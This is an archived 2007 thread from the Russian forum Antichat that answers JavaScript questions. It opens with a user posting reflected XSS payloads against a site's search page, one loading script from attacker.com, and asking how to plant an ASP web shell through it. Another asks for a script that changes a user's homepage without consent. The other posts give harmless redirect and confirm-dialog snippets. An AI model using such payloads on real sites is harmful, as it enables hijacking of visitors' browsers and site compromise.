Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   [JavaScript, AJAX] Задай вопрос, получи ответ (https://forum.antichat.xyz/showthread.php?t=41870)

Tw!m4 16.06.2007 12:43

Привет народ!

Собссно такое дело.....есть сайт на котором иксэсэс такова рода:
_http://site.com/search.asp?query="><script>alert()</script>

хз какова типа (пассивный или активный), можна ли залить на него асп-эшный шелл таким путём? если да, то расскажите по подробней плз, а то в иксэсэсах я не очень шарю. Я уже пробовал таким путём прописать его:
_http://site.com/search.asp?query="><script src=http://attacker.com/script.js></script>
Где скрипт.жс указывает прописать шелл на (в) страницу с функцией document.write() , но в итоге я получаю контент этого шелла на странице.

Подскажте плз...

//ЗЫ: Со снифером дело отпадает....

Tw!m4 16.06.2007 14:51

Хех......)) чета я об этом даже и не подумал (о выполнение кода в браузере а не на серваке).....хм.....аякс я к сожелению не знаю.....эта значит я в пролёте? да уж....фигня какая то ((......а че можна в таком случае еще сделать?

Макс 8===3 17.06.2007 09:00

Всем привет, подскажите плиз скрипт редиректа без задержки. Есть такой :

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://">

Но он всёрабно перед загрузкой нужной страницы заходит на главную....

Спасибо!

hhover 17.06.2007 09:14

Только при помощи php или htaccess.
PHP код:

<?php
header 
"Location: http://site.com" );
?>


Макс 8===3 17.06.2007 16:30

Понял, спасибо! впринципе уже добился чего хотел, а ещё такой вопрос. Подскажите скрипт который добавляет нужную страницу на стартовую страницу, и\или в избранное без ведома юзера!!!!

Raz0r 19.06.2007 18:27

Макс 8===3, кстати, редирект можно и с помощью JS замутить, и будет, вроде как без задержки.
PHP код:

<script language="JavaScript">
 
document.location.href "http://someshit/";
</
script

Правда в случае отключенного JS, ясен, не покатит, так-что PHP вариант рулит ;) но раз уж тут тема про JS решил запостить.

RaiDeRz 21.06.2007 23:26

Каким образом можно сделать подтверждение нажатия на ссылку? Дайте пример

GreenBear 21.06.2007 23:34

Код:

<script type='text/javascript'>
function check(url){
if(confirm("да?")){
document.location=url;
}else{
alert('нет так нет');
}
}
</script>
<a href='javascript://' onClick="check('next.page)">123</a>


RaiDeRz 22.06.2007 00:05

Цитата:

Сообщение от GreenBear
Код:

<script type='text/javascript'>
function check(url){
if(confirm("да?")){
document.location=url;
}else{
alert('нет так нет');
}
}
</script>
<a href='javascript://' onClick="check('next.page)">123</a>


че-то непашет)) наверно из-за неправильного кода в a href

GreenBear 22.06.2007 00:09

ну ковычку сами догадаетесь поставить.


Время: 00:35